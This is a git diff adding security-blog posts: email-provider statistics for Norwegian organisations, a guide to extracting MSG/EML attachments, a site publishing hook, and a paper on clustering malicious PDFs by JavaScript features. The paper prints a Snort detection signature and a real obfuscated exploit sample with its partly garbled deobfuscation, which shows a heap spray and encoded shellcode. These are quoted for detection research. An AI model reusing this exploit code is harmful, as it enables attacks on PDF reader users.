||||||
|
5. Generate CSV output based on each sector grouping above.
|
||||||
|
|
||||||
|
|
||||||
|
## The Result
|
||||||
|
|
||||||
|
The top vendor was not surprising Microsoft's outlook.com. For the
|
||||||
|
120k sites, 98k resolved an MX record. Of these I will give an
|
||||||
|
outlook.com summary as follows, as it would seem this is the
|
||||||
|
dominating actor in all categories:
|
||||||
|
|
||||||
|
* In government 61% is O365 users (1420/2317)
|
||||||
|
|
||||||
|
* For municipals, the amount is 55% (688/1247)
|
||||||
|
|
||||||
|
* For the diverse financial grouping, 21% uses O365 (4836/23125)
|
||||||
|
|
||||||
|
* For the diverse private companies 38% uses O365 (14615/38129)
|
||||||
|
|
||||||
|
Of the 98k sites Microsoft runs the email service for 21559
|
||||||
|
organisations. For comparison Google MX domains accounts
|
||||||
|
for about 5500.
|
||||||
|
|
||||||
|
While the above are directly a measurement of who delivers email
|
||||||
|
services, it also indicated that these organisations relies on
|
||||||
|
other services, such as internal wikis and direct messaging.
|
||||||
|
|
||||||
|
An overview of the top 10 vendors are shown below.
|
||||||
|
|
||||||
|
![](static/img/data/mx_domains.png)
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
## Sources of Errors
|
||||||
|
|
||||||
|
Even though I believe the statistics above is representative it
|
||||||
|
has some possible sources of error:
|
||||||
|
|
||||||
|
1. The organisation isn't listed with URL in the organisation
|
||||||
|
registry or it uses a domain not associated with the primary
|
||||||
|
domain of its web address
|
||||||
|
|
||||||
|
2. The organisation uses an SMTP proxy
|
||||||
|
|
||||||
|
3. The organisation has an inactive SMTP record
|
||||||
|
|
||||||
|
I found that there are more than 1 million listed organisations in
|
||||||
|
the brreg.no registry and 120k websites in the JSON data
|
||||||
|
provided. This means this dataset represent at most 12% of the
|
||||||
|
companies listed.
|
||||||
|
|
||||||
|
Also, email doesn't represent a diverse infrastructure, but I
|
||||||
|
believe it is an indicator of the current trends also for other
|
||||||
|
cloud services in e.g. Azure, Google Compute Engine and so on.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
[1] CyberInsecurity: The Cost of Monopoly, Geer et àl, 2003 -
|
||||||
|
https://cryptome.org/cyberinsecurity.htm
|
||||||
|
|
||||||
|
[2] Cybersecurity as Realpolitik by Dan Geer presented at Black
|
||||||
|
Hat USA 2014: https://www.youtube.com/watch?v=nT-TGvYOBpI
|
||||||
|
|
||||||
|
[3] https://data.brreg.no/enhetsregisteret/api/enheter/lastned
|
||||||
|
|
||||||
|
[4] https://www.ssb.no/klass/klassifikasjoner/39
|
58
data/msg-eml.md
Normal file
58
data/msg-eml.md
Normal file
|
@ -0,0 +1,58 @@
|
||||||
|
Thought I’d share a neat little script-combo if you do your
|
||||||
|
email analysis on Linux systems, or do automation. For the
|
||||||
|
task you’ll need msgconvert.pl [1] and ripmime [2].
|
||||||
|
|
||||||
|
MSG files are used by Microsoft Outlook, and is the natural
|
||||||
|
fit in regard to malicious messages in organizations running
|
||||||
|
Microsoft products. For reference you can find the
|
||||||
|
specification for the Outlook Item File Format here.
|
||||||
|
|
||||||
|
In this part you will require a file from Outlook, which you
|
||||||
|
can acquire by selecting a message and drag it to the
|
||||||
|
desktop or a new message. If you don’t do Outlook, you can
|
||||||
|
just google for one [3].
|
||||||
|
|
||||||
|
msgconvert.pl <message>.msg
|
||||||
|
ripmime -i <message>.mime
|
||||||
|
|
||||||
|
The above will first convert the MSG file to a mime
|
||||||
|
file. The latter command will make sure to extract the
|
||||||
|
objects in it, such as binary files or documents. The text
|
||||||
|
files contains the content of the email and will be
|
||||||
|
something like: textfile0
|
||||||
|
|
||||||
|
If you need the headers you will find them at the top of the
|
||||||
|
mime-file.
|
||||||
|
|
||||||
|
Now to EML-files, which you will also often find when
|
||||||
|
exporting email messages. EML is really just short for
|
||||||
|
“E-mail”. In OS X Mail, Outlook Express, Thunderbird (and
|
||||||
|
others) you are typically presented with EML/MIME-formatted
|
||||||
|
documents, and it’s just a document which complies with RFC
|
||||||
|
822 [4]. EML-files are more easy to work on since you can
|
||||||
|
open it in a text editor and read the essential information
|
||||||
|
plain straight away.
|
||||||
|
|
||||||
|
So what does that mean in regard to ripmime? It really just
|
||||||
|
means that instead of calling the output from msgconvert.pl
|
||||||
|
<message>.mime, you can name the file <message>.eml. In
|
||||||
|
commands:
|
||||||
|
|
||||||
|
ripmime -i <message>.eml
|
||||||
|
|
||||||
|
The above will output your mime parts.
|
||||||
|
|
||||||
|
## OS X Specifics
|
||||||
|
|
||||||
|
You may want to do the above on an OS X system as well. For
|
||||||
|
this you can install ripmime via Homebrew [5].
|
||||||
|
|
||||||
|
If you are exporting an eml from Apple Mail you may do so
|
||||||
|
the same way as in Outlook: Just drag it where you want it.
|
||||||
|
|
||||||
|
|
||||||
|
[1] https://www.matijs.net/software/msgconv/
|
||||||
|
[2] https://www.pldaniels.com/ripmime/
|
||||||
|
[3] https://www.google.com/search?q=filetype:msg&oq=filetype:msg#q=filetype:msg+outlook
|
||||||
|
[4] https://tools.ietf.org/html/rfc822
|
||||||
|
[5] https://brew.sh/index_nb
|
70
data/new-format.md
Normal file
70
data/new-format.md
Normal file
|
@ -0,0 +1,70 @@
|
||||||
|
After being off the HTML grid for a while, using Hugo as a
|
||||||
|
static site generator for Gopher. I went tired of the
|
||||||
|
upgrade and complexity issues with publishing new
|
||||||
|
content. It all culminated with Hugo refusing to generate
|
||||||
|
the site at all after the last update.
|
||||||
|
|
||||||
|
Because of the Hugo failure I needed to create a new
|
||||||
|
strategy, and not being willing to change to another complex
|
||||||
|
generator system I went hunting for something else.
|
||||||
|
|
||||||
|
I am happy with my current backend publishing setup, which
|
||||||
|
uses git and a post-receive hook:
|
||||||
|
|
||||||
|
pwd=$(pwd)
|
||||||
|
if test -z "${pwd##*.git}"
|
||||||
|
then repo="$pwd"
|
||||||
|
else repo="$pwd/.git"
|
||||||
|
fi
|
||||||
|
|
||||||
|
git --work-tree=~/secdiary/content --git-dir=~/secdiary/content.git checkout -f
|
||||||
|
cd ~/secdiary
|
||||||
|
rm -r /var/www/secdiary.com/*
|
||||||
|
rm -r /var/gopher/*
|
||||||
|
cp -R html/* /var/www/secdiary.com/
|
||||||
|
cp -R gopher/* /var/gopher/
|
||||||
|
|
||||||
|
cp ~/twtxt/content/twtxt.txt /var/www/secdiary.com/
|
||||||
|
|
||||||
|
echo "\nBuild: " >> /var/gopher/index.gph
|
||||||
|
git --git-dir=~/secdiary/content.git log -1 --pretty="%H%n%ci" >> /var/gopher/index.gph
|
||||||
|
|
||||||
|
I also publish twtxt messages in a similar way. My twtxt
|
||||||
|
config looks like the following:
|
||||||
|
|
||||||
|
[twtxt]
|
||||||
|
nick = tommy
|
||||||
|
twtfile = ~/twtxt/twtxt.txt
|
||||||
|
twturl = http://secdiary.com
|
||||||
|
disclose_identity = False
|
||||||
|
character_limit = 140
|
||||||
|
character_warning = 140
|
||||||
|
post_tweet_hook = "cd ~/twtxt/ && git pull && git add twtxt.txt && git commit -m 'added new tweet' && git push"
|
||||||
|
|
||||||
|
In addition to my twtxt feed, I am present on Mastodon,
|
||||||
|
which lead me to Solene's static site generator cl-yag
|
||||||
|
[1,2]. I decided to generate the site client-side for
|
||||||
|
now, but in the future I'll likely move this to the server
|
||||||
|
for less complex workflows on my workstations. This also
|
||||||
|
fits me well since I'll be moving more of my workflow to
|
||||||
|
OpenBSD in the coming months.
|
||||||
|
|
||||||
|
The layout of my new site is more or less shamelessly stolen
|
||||||
|
from Solene as well. I plan to customize that to my liking as
|
||||||
|
we go.
|
||||||
|
|
||||||
|
And with that I am back in the WWW space, however in a
|
||||||
|
limited format. I am currently reviewing my 50 current
|
||||||
|
posts and will assess what can be of use in the future. This
|
||||||
|
will involve some rewriting as well, since this space will
|
||||||
|
be text-only out of respect for your time.
|
||||||
|
|
||||||
|
I also enabled TLS on the site for those that would like to
|
||||||
|
browse privately, opposed to my current Gopher setup. The
|
||||||
|
latter you may find on ``gopher://secdiary.com``.
|
||||||
|
|
||||||
|
Feel free to reach out to me in the Fediverse. I'm there as
|
||||||
|
@tommy@cybsec.network.
|
||||||
|
|
||||||
|
[1] https://dataswamp.org/\~solene/2018-10-12-cl-yag-20181012.html
|
||||||
|
[2] git://bitreich.org/cl-yag
|
792
data/novel-pdf-detection.md
Normal file
792
data/novel-pdf-detection.md
Normal file
|
@ -0,0 +1,792 @@
|
||||||
|
For some time now the Portable Document Format standard has
|
||||||
|
been a considerable risk in regard to corporate as well as
|
||||||
|
private information security concerns. Some work has been
|
||||||
|
done to classify PDF documents as malicious or benign, but
|
||||||
|
not as much when it comes to clustering the malicious
|
||||||
|
documents by techniques used. Such clustering would provide
|
||||||
|
insight, in automated analysis, to how sophisticated an
|
||||||
|
attack is and who staged it. A 100.000 unique PDF dataset
|
||||||
|
was supplied by the Shadowserver foundation. Analysis of
|
||||||
|
experiment results showed that 97% of the documents
|
||||||
|
contained javascripts. This and other sources revealed that
|
||||||
|
most exploits are delivered through such, or similar object
|
||||||
|
types. Based on that, javascript object labeling gets a
|
||||||
|
thorough focus in the paper.
|
||||||
|
|
||||||
|
The scope of the paper is limited to extend the attribution
|
||||||
|
research already done in regard to PDF documents, so that a
|
||||||
|
feature vector may be used in labeling a given (or a batch)
|
||||||
|
PDF to a relevant cluster. That as an attempt to recognize
|
||||||
|
different techniques and threat agents.
|
||||||
|
|
||||||
|
> Javascript is currently one of the most exploited PDF
|
||||||
|
objects. How can the PDF feature vector be extended to
|
||||||
|
include a javascript subvector correctly describing the
|
||||||
|
technique/style, sophistication and similarity to previous
|
||||||
|
malicious PDF documents. How does it relate to the term
|
||||||
|
digital evidence?
|
||||||
|
> — Problem statement
|
||||||
|
|
||||||
|
The problem statement considers the coding styles and
|
||||||
|
obfuscation techniques used and the related sophistication
|
||||||
|
in the coding style. Least but most important the statement
|
||||||
|
involves how the current PDF document measures to others
|
||||||
|
previously labeled. These are all essential problems when it
|
||||||
|
comes to automatated data mining and clustering.
|
||||||
|
|
||||||
|
### A. Related Work
|
||||||
|
|
||||||
|
Proposed solutions for malicious contra benign
|
||||||
|
classification of PDF documents has been explicitly
|
||||||
|
documented in several papers. Classification using support
|
||||||
|
vector machines (SVM) was handled by Jarle Kittilsen in his
|
||||||
|
recent Master's thesis1.
|
||||||
|
|
||||||
|
Further, the author of this paper in his bachelor's thesis2
|
||||||
|
investigated the possibility to detect obfuscated malware by
|
||||||
|
analyzing HTTP data traffic known to contain malware. In
|
||||||
|
regard, the findings were implemented, designed and tested
|
||||||
|
in Snort. Some of the detection techniques will be used as a
|
||||||
|
fundament for labeling in this paper.
|
||||||
|
|
||||||
|
Even though much good work has been done in the era of
|
||||||
|
analyzing malicious PDF documents, many of the resulting
|
||||||
|
tools are based on manual analysis. To be mentioned are
|
||||||
|
Didier Stevens who developed several practical tools, such
|
||||||
|
as the PDF parser and PDFid. These tools are not only tools,
|
||||||
|
but was the beginning of a structured way of looking at
|
||||||
|
suspicious objects in PDF documents as well. To be credited
|
||||||
|
as well is Paul Baccas in Sophos, which did considerable
|
||||||
|
work on characterizing malicious contra benign PDF
|
||||||
|
documents3.
|
||||||
|
|
||||||
|
The paper will be doing research into the feature,
|
||||||
|
javascript subvector of malicious PDF documents. To be able
|
||||||
|
to determine an effective vector (in this experimental
|
||||||
|
phase), it is essential that the dataset is filtered,
|
||||||
|
meaning that the files must be malicious. As Kittilsen has
|
||||||
|
done in regard to PDF documents, Al-Tharwa et ál2 has done
|
||||||
|
interesting work to detect malicious javascript in browsers.
|
||||||
|
|
||||||
|
## Background
|
||||||
|
### A.1. The Feature Vector in Support of Digital Evidence
|
||||||
|
|
||||||
|
Carrier and Spafford defined "digital evidence" as any
|
||||||
|
digital data that contain reliable information that supports
|
||||||
|
or refutes a hypothesis about the incident7. Formally, the
|
||||||
|
investigation process consists of five parts and is
|
||||||
|
specially crafted for maintaining evidence integrity, the
|
||||||
|
order of volatility (OOV) and the chain of custody. This all
|
||||||
|
leads up to the term forensic soudness.
|
||||||
|
|
||||||
|
The investigation process consists of five phases. Note the
|
||||||
|
identification and analysis phase.
|
||||||
|
|
||||||
|
![Fig. 1: The investigation process. The investigation
|
||||||
|
process consists of five phases9. Note the identification
|
||||||
|
and analysis
|
||||||
|
phase](/images/2015/02/Theinvestigationprocess-e1380485641223.png)
|
||||||
|
|
||||||
|
In this paper, forensic soudness is a notion previously
|
||||||
|
defined10 as meaning: No alternation of source data has
|
||||||
|
occured. Traditionally this means that every bit of data is
|
||||||
|
copied and no data added. The previous paper stated two
|
||||||
|
elementary questions:
|
||||||
|
|
||||||
|
* Can one trust the host where the data is collected from?
|
||||||
|
* Does the information correlate to other data?
|
||||||
|
|
||||||
|
When it comes to malicious documents, they are typically
|
||||||
|
collected in two places:
|
||||||
|
|
||||||
|
1. In the security monitoring logging, the pre-event phase
|
||||||
|
2. When an incident has occured and as part of the reaction to an
|
||||||
|
incident (the collection phase)
|
||||||
|
|
||||||
|
Now, the ten thousand dollar question: When a malicious
|
||||||
|
document gets executed on the computer, how is it possible
|
||||||
|
to get indications that alteration of evidence has occured?
|
||||||
|
The answer is potentially the first collection point, the
|
||||||
|
pre-event logging.
|
||||||
|
|
||||||
|
In many cases, especially considering targeted attacks, it
|
||||||
|
is not possible to state an PDF document as malicious in the
|
||||||
|
pre-event phase. The reason for this is often the way the
|
||||||
|
threat agent craft his attack to evade the security
|
||||||
|
mechanisms in the target using collected intelligence. Most
|
||||||
|
systems in accordance to local legislation should then
|
||||||
|
delete the content data. A proposition though is to store
|
||||||
|
the feature vector.
|
||||||
|
|
||||||
|
The reasoning behind storing a feature vector is quite
|
||||||
|
simple: When storing hashes, object counts and the
|
||||||
|
javascript subvector which we will return to later in the
|
||||||
|
paper, it will be possible to indicate if the document
|
||||||
|
features has changed. On the other side there is no
|
||||||
|
identifiable data invading privacy.
|
||||||
|
|
||||||
|
It is reasonable to argue that the measure of how similar
|
||||||
|
one PDF document is to another, is also the measure of how
|
||||||
|
forensically sound the evidence collected in a post-event
|
||||||
|
phase is. How likely it is that the document aquired in the
|
||||||
|
collection phase is the same as the one in the pre-phase is
|
||||||
|
decided by the characteristics supplied by the feature
|
||||||
|
vectors of both. Further, the feature-vector should be as
|
||||||
|
rich and relevant as possible.
|
||||||
|
|
||||||
|
![Fig. 2: Correlation by using the feature vector of the PDF
|
||||||
|
document. Illustration of a possible pre/post incident
|
||||||
|
scenario](/images/2015/02/Preandpost.png)
|
||||||
|
|
||||||
|
### A.2. Identification as an Extension of Similarity
|
||||||
|
|
||||||
|
The notion of similarity largely relates to the feature
|
||||||
|
vector: How is it in large quantities of data possible to
|
||||||
|
tell if the new PDF document carries similar characteristics
|
||||||
|
like others of a larger dataset.
|
||||||
|
|
||||||
|
In his work with semantic similarity and preserving hashing,
|
||||||
|
M. Pittalis11 defined similarity from the Merriam-Webster
|
||||||
|
dictionary:
|
||||||
|
|
||||||
|
> Similarity: The existance of comparable aspect between two
|
||||||
|
> elements
|
||||||
|
> – Merriam-Webster Dictionary
|
||||||
|
|
||||||
|
The measure of similarity is important in regard to
|
||||||
|
clustering or grouping the documents. When clustering
|
||||||
|
datasets the procedure is usually in six steps, finding the
|
||||||
|
similarity measure is step 2.
|
||||||
|
|
||||||
|
1. Feature selection
|
||||||
|
2. Proximity/similarity measure
|
||||||
|
3. Clustering criterion
|
||||||
|
4. Clustering algorithm
|
||||||
|
5. Validation
|
||||||
|
6. Interpretation
|
||||||
|
|
||||||
|
In this paper the k-means unsupervised learning clustering
|
||||||
|
algorithm was consideres. This simple algorithm groups the
|
||||||
|
number n observations into k clusters22. Each observation
|
||||||
|
relates to the cluster with the nearest mean.
|
||||||
|
|
||||||
|
Now, as will be seen over the next two sections, work done
|
||||||
|
in the subject is mostly missing out on giving a valid
|
||||||
|
similarity measure when it comes to classifying PDF
|
||||||
|
documents as anything other than malicious or benign. So, to
|
||||||
|
be able to cluster the PDF documents the feature vector will
|
||||||
|
need a revision.
|
||||||
|
|
||||||
|
As Pittalis introduced the concept of similarity, it is
|
||||||
|
important to define one more term: Identification. According
|
||||||
|
to the American Heritage Dictionary, identification is:
|
||||||
|
|
||||||
|
> Proof or Evidence of Identity.
|
||||||
|
> — The American Heritage Dictionary
|
||||||
|
|
||||||
|
In our context this means being able to identify a PDF
|
||||||
|
document and attribute it to e.g. a certain type of botnet
|
||||||
|
or perhaps more correct a coding or obfuscation
|
||||||
|
technique. In an ideal state this will give an indication to
|
||||||
|
which threat agent is behind the attack. This is something
|
||||||
|
that has not been researched extensively in regard to PDF
|
||||||
|
documents earlier.
|
||||||
|
|
||||||
|
### C. The Portable Document Format
|
||||||
|
|
||||||
|
When it comes to the feature vector of the portable document
|
||||||
|
format (PDF), it is reasonable to have a look at how PDF
|
||||||
|
documents are structured. The PDF consists of objects, each
|
||||||
|
object is of a certain type. As much research has been done
|
||||||
|
on the topic previously, the format itself will not be
|
||||||
|
treated any further in this paper12.
|
||||||
|
|
||||||
|
![A simplified illustration of the portable document format](/images/2015/02/ObjectdescriptionPDF-2.png)
|
||||||
|
|
||||||
|
When considering malicious PDF documents, relevant
|
||||||
|
statistics has shown the following distribution of resource
|
||||||
|
objects:
|
||||||
|
|
||||||
|
**Known Malicious Datasets Objects** A table showing a
|
||||||
|
number interesting and selected features in malicious seen
|
||||||
|
against clean PDF documents. Baccas used two datasets where
|
||||||
|
one indicated slightly different results.
|
||||||
|
|
||||||
|
Dataset Object Type Clean (%) Malicious (%)
|
||||||
|
The Shadowserver 100k PDF malicious dataset /JavaScript NA 97%
|
||||||
|
--
|
||||||
|
Paul Baccas' Sophos 130k malicious/benign dataset3 /JavaScript 2% 94%
|
||||||
|
/RichMedia 0% 0,26%
|
||||||
|
/FlateDecode 89% 77%
|
||||||
|
/Encrypt 0,91% 10,81%
|
||||||
|
|
||||||
|
What can be seen of the table above is that when it comes to
|
||||||
|
the distribution of objects in malicious files, most of them
|
||||||
|
contains javascript. This makes it very hard to distinguish
|
||||||
|
and find the similarity between the documents without
|
||||||
|
considering a javascript subvector. The author would argue
|
||||||
|
that this makes it a requirement for a javascript subvector
|
||||||
|
to be included in the PDF feature vector to make it a
|
||||||
|
valid. In previous work, where the aim has been to
|
||||||
|
distinguish between malicious and benign, this has not been
|
||||||
|
an issue.
|
||||||
|
|
||||||
|
### D. Closing in on the Core: The PDF Javascript Feature Subvector
|
||||||
|
|
||||||
|
Javascript is a client-side scripting language primarily
|
||||||
|
offering greater interactivity with webpages. Specifically
|
||||||
|
javascript is not a compiled language, weakly-typed4 and has
|
||||||
|
first-class functions5. In form of rapid development, these
|
||||||
|
features gives great advantages. In a security perspective
|
||||||
|
this is problematic. The following states a Snort signature
|
||||||
|
to detect a javascript "unescape"-obfuscation technique2(we
|
||||||
|
will return to the concept of obfuscation later on):
|
||||||
|
|
||||||
|
alert tcp any any -> any any (msg:”Obfuscated unescape”; sid: 1337003; content:”replace”; pcre:”/u.{0,2}n.{0,2}e.{0,2}s.{0,2}c.{0,2}a.{0,2}p.{0,1}e’ ?.replace (/”;rev:4;)
|
||||||
|
|
||||||
|
Traditionally javascript is integrated as a part of an
|
||||||
|
browser. Seen from a security perspective, this opens for
|
||||||
|
what is commonly known as client-side attacks. More
|
||||||
|
formally: Javascript enables programmatic access to
|
||||||
|
computational objects within a host environment. This is
|
||||||
|
complicated as javascript comes in different flavors, making
|
||||||
|
general parsing and evaluation complex6, as may be seen of
|
||||||
|
the above signature. The flavors are often specific to the
|
||||||
|
application. Today, most browsers are becoming more aligned
|
||||||
|
due to the requirements of interoperability. Some
|
||||||
|
applications, such as the widely deployed Adobe Reader has
|
||||||
|
some extended functionality though, which we will be
|
||||||
|
focusing on in this paper.
|
||||||
|
|
||||||
|
Even though javascript may pose challenges to security, it
|
||||||
|
is important to realize that this is due to
|
||||||
|
complexity. Javascript (which is implemented through
|
||||||
|
SpiderMonkey in Mozilla18-products and in Adobe Reader as
|
||||||
|
well) builds on a standard named ECMA-262. The ECMA is an
|
||||||
|
standardization-organ of Information and Communication
|
||||||
|
Technology (ICT) and Consumer Electronics (CE)17. Thus,
|
||||||
|
Javascript is built from the ECMAScript scripting language
|
||||||
|
standard. To fully understand which functions is essential
|
||||||
|
in regard to malicious Javascripts this paper will rely on
|
||||||
|
the ECMAScript Language Specification19 combined with expert
|
||||||
|
knowledge.
|
||||||
|
|
||||||
|
### E. Introducing Obfuscation
|
||||||
|
|
||||||
|
Harawa et al.8 describes javascript obfuscation by six elements:
|
||||||
|
|
||||||
|
* Identifier reassignment or randomization
|
||||||
|
* Block randomization
|
||||||
|
* White space and comment randomization
|
||||||
|
* Strings encoding
|
||||||
|
* String splitting
|
||||||
|
* Integer obfuscation
|
||||||
|
|
||||||
|
Further, Kittilsen1 documented a javascript feature vector
|
||||||
|
which states the following functions as potentially
|
||||||
|
malicious: [function, eval_length, max_string, stringcount,
|
||||||
|
replace, substring, eval, fromCharCode]. Even though his
|
||||||
|
confusion matrix shows good results, there are some problems
|
||||||
|
when it comes to evaluating these as is: Such characters are
|
||||||
|
usually obfuscated. The following is an example from sample
|
||||||
|
``SHA256:d3874cf113fa6b43e7f6e2c438bd500edea5cae7901e2bf921b9d0d2bf081201]``:
|
||||||
|
|
||||||
|
if((String+'').substr(1,4)==='unct'){e="".indexOf;}c='var _l1="4c206f5783eb9d;pnwAy()utio{.VsSg',h<+I}*/DkR%x-W[]mCj^?:LBKQYEUqFM';l='l';e=e()[((2+3)?'e'+'v':"")+"a"+l];s=[];a='pus'+'h';z=c's'+"ubstr" [1];sa [2];z=c's'+"ubstr" [3];sa [2];z=c['s'+"ubstr"] [...]e(s.join(""));}
|
||||||
|
|
||||||
|
The above example tells an interesting story about the
|
||||||
|
attackers awareness of complexity. In respect to Kittilsens
|
||||||
|
javascript feature vector the above would yield the
|
||||||
|
following result: [0,x,x,x,0,0,0,0] (considerable results on
|
||||||
|
the second to fourth, plus one count if we are to shorten
|
||||||
|
substring to substr), in other words the features are to be
|
||||||
|
found in the embedded, obfuscated javascript, but not in
|
||||||
|
clear text. When it comes to eval_length, max_string and
|
||||||
|
string_count we will return to those later in the paper.
|
||||||
|
|
||||||
|
Deobfuscated, the script would look like:
|
||||||
|
|
||||||
|
var _l1="[...]";_l3=app;_l4=new Array();function _l5(){var _l6=_l3.viewerVersion.toString();_l6=_l6.replace('.','');while(_l6.length&4)_l6l='0';return parsetnt(_l6,10);function _l7(_l8,_l9){while(_l8.length+2&_l9)_l8l=_l8;return _l8.substring(0,_l9I2);function _t0(_t1){_t1=unescape(_t1);rote}a*=_t1.length+2;da*/ote=unescape('Du9090');spray=_l7(da*/ote,0k2000Rrote}a*);lok%hee=_t1lspray;lok%hee=_l7(lok%hee,524098);for(i=0; i & 400; ill)_l4xi-=lok%hee.substr(0,lok%hee.lengthR1)lda*/ote;;function _t2(_t1,len){while(_t1.length&len)_t1l=_t1;return _t1.substring(0,len);function _t3(_t1){ret='';for(i=0;i&_t1.length;il=2){b=_t1.substr(i,2);c=parsetnt(b,16);retl=String.froW[har[ode(c);;return ret;function _]i1(_t1,_t4){_t5='';for(_t6=0;_t6&_t1.length;_t6ll){_l9=_t4.length;_t7=_t1.char[odeAt(_t6);_t8=_t4.char[odeAt(_t6D_l9);_t5l=String.froW[har[ode(_t7m_t8);;return _t5;function _t9(_t6){_]0=_t6.toString(16);_]1=_]0.length;_t5=(_]1D2)C'0'l_]0j_]0;return _t5;function _]2(_t1){_t5='';for(_t6=0;_t6&_t1.length;_t6l=2){_t5l='Du';_t5l=_t9(_t1.char[odeAt(_t6l1));_t5l=_t9(_t1.char[odeAt(_t6));return _t5;function _]3(){_]4=_l5();if(_]4&9000){_]5='oluAS]ggg*pu^4?:IIIIIwAAAA?AAAAAAAAAAAALAAAAAAAAfhaASiAgBA98Kt?:';_]6=_l1;_]7=_t3(_]6);else{_]5='*?lAS]iLhKp9fo?:IIIIIwAAAA?AAAAAAAAAAAALAAAAAAAABk[ASiAgBAIfK4?:';_]6=_l2;_]7=_t3(_]6);_]8='SQ*YA}ggAA??';_]9=_t2('LQE?',10984);_ll0='LLcAAAK}AAKAAAAwtAAAALK}AAKAAAA?AAAAAwK}AAKAAAA?AAAA?gK}AAKAAAA?AAAAKLKKAAKAAAAtAAAAEwKKAAKAAAAwtAAAQAK}AUwAAA[StAAAAAAAAAAU}A]IIIII';_ll1=_]8l_]9l_ll0l_]5;_ll2=_]i1(_]7,'');if(_ll2.lengthD2)_ll2l=unescape('D00');_ll3=_]2(_ll2);with({*j_ll3;)_t0(*);Ywe123.rawValue=_ll1;_]3();
|
||||||
|
|
||||||
|
Which through the simple Python script javascript feature
|
||||||
|
vector generator (appendice 1), yields:
|
||||||
|
|
||||||
|
['function: 9', 'eval_length: x', 'max_string: x', 'stringcount: x', 'replace: 1', 'substring|substr: 4', 'eval: 0', 'fromCharCode: 0']
|
||||||
|
|
||||||
|
Harawa et al.' 6 elements of javascript obfuscation is
|
||||||
|
probably a better, or necessary supplemental approach to
|
||||||
|
Kittilsens work.
|
||||||
|
|
||||||
|
There is a notable difference between deobfuscation and
|
||||||
|
detecting obfuscation techniques. The difference consists of
|
||||||
|
the depth of insight one might gain in actually
|
||||||
|
deobfuscating a javascript as it will reveal completely
|
||||||
|
different code while the obfuscation routines may be based
|
||||||
|
on a generic obfuscator routine used by several threat
|
||||||
|
agents. This is much like the issue of packers in regard to
|
||||||
|
executables23.
|
||||||
|
|
||||||
|
This section has shown the difficulties of balancing
|
||||||
|
deobfuscation for a more detailed coding style analysis
|
||||||
|
against a less specific feature vector by using abstract
|
||||||
|
obfuscation detection.
|
||||||
|
|
||||||
|
## Extracting and Analysing a PDF Feature Vector
|
||||||
|
|
||||||
|
### A. Deobfuscation - Emerging Intentions
|
||||||
|
|
||||||
|
Usually the most pressing question when an incident
|
||||||
|
involving a PDF document occur is: Who did it, and what's
|
||||||
|
his intentions. This is also a consideration when further
|
||||||
|
evolving the PDF feature vector. In the next figure is a
|
||||||
|
model describing three groups of threat agents, where one
|
||||||
|
usually stands out. Such as if a Stuxnet scale attack24
|
||||||
|
involving a PDF document is perceived it will be associated
|
||||||
|
with a cluster containing "group 1" entities.
|
||||||
|
|
||||||
|
While Al-Tharwa et ál2 argues for no need for deobfuscation
|
||||||
|
in regard to classification, deobfuscation is an important
|
||||||
|
step in regard to finding a distinct feature vector. The
|
||||||
|
issue is that in most situations it isn't good enough to
|
||||||
|
tell if the documents is malicious, but also in addition to
|
||||||
|
who, what, where and how it was created. In regard to being
|
||||||
|
defined as valid digital evidence a rich feature vector (in
|
||||||
|
addition to the network on-the-fly hash-sum) is part of
|
||||||
|
telling. The latter also makes itself relevant when it comes
|
||||||
|
to large quantities of data, where an analyst is not capable
|
||||||
|
of manually analyzing and identifying hundreds to tens of
|
||||||
|
thousands of PDF documents each day.
|
||||||
|
|
||||||
|
![Fig. 4: The threat agent modelA model describing three
|
||||||
|
groups of attackers. These are necessary to filter and
|
||||||
|
detect in the collection
|
||||||
|
phase](/images/2015/02/threat-agent-model.png)
|
||||||
|
|
||||||
|
### B. Technical Problems During Deobfuscation
|
||||||
|
|
||||||
|
Normally most javascript engines, such as Mozillas
|
||||||
|
Spidermonkey15, Google V816 and others, tend to be
|
||||||
|
javascript libraries for browsers and miss some basic
|
||||||
|
functionality in regard to Adobe Reader which is the most
|
||||||
|
used PDF reader. These engines is most often used for
|
||||||
|
dynamic analysis of Javascripts and is a prerequiste when it
|
||||||
|
comes to being able to completely deobfuscate javascripts.
|
||||||
|
|
||||||
|
To prove the concepts of this article a static Python
|
||||||
|
feature vector generator engine based on a rewritten version
|
||||||
|
of the Jsunpack-n14project is used. The application used in
|
||||||
|
the paper is providing a vector based interpretation of the
|
||||||
|
static script, meaningn it is not run it dynamically.
|
||||||
|
|
||||||
|
Reliably detecting malicious PDF documents is a challenge
|
||||||
|
due to the obfuscation routines often used. This makes it
|
||||||
|
necessary to perform some kind of deobfuscation to reveal
|
||||||
|
more functionality. Even if one managed to deobfuscate the
|
||||||
|
script one time, there may be several rounds more before it
|
||||||
|
is in clear text. This was a challenge not solvable in the
|
||||||
|
scope of this article.
|
||||||
|
|
||||||
|
Due to parsing errors under half of the Shadowserver 100k
|
||||||
|
dataset was processed by the custom Jsunpack-n module.
|
||||||
|
|
||||||
|
### C. Introducing Two Techniques: Feature Vector Inversion and Outer Loop Obfuscation Variable Computation
|
||||||
|
|
||||||
|
As have been very well documented so far in the paper it is
|
||||||
|
more or less impossible to completely automate an
|
||||||
|
deobfuscation process of the PDF format. Obfuscation leaves
|
||||||
|
many distinct characteristics though, so the threat agent on
|
||||||
|
the other hand must be careful to not trigger anomaly
|
||||||
|
alarms. There is a balance. This part of the article
|
||||||
|
introduces two novel techniques proposed applied to the
|
||||||
|
javascript subvector to improvie its reliability.
|
||||||
|
|
||||||
|
#### C.1. Outer Loop Obfuscation Variable Computation (OLOVC)
|
||||||
|
|
||||||
|
When the threat agent implements obfuscation, one of his
|
||||||
|
weaknesses is being detected using obfuscation. When it
|
||||||
|
comes to PDF documents using javascripts alone is a
|
||||||
|
trigger. Now, the threat agent is probably using every trick
|
||||||
|
in the book, meaning the 6 elements of javascripts
|
||||||
|
obfuscation8. The job of an analyst in such a matter will be
|
||||||
|
to predict new obfuscation attempts and implement anomaly
|
||||||
|
alerts using the extended PDF feature vector.
|
||||||
|
|
||||||
|
Throughout this paper we will name this technique "Outer
|
||||||
|
Loop Obfuscation Variable Computation". The term "outer
|
||||||
|
loop" most often refer to round zero or the first of the
|
||||||
|
deobfuscation routines. Variable computation is as its name
|
||||||
|
states, a matter of computing the original javascript
|
||||||
|
variable. As we have seen this may be done by either
|
||||||
|
deobfuscating the script as a whole including its
|
||||||
|
near-impossible-for-automation complexity, or use the
|
||||||
|
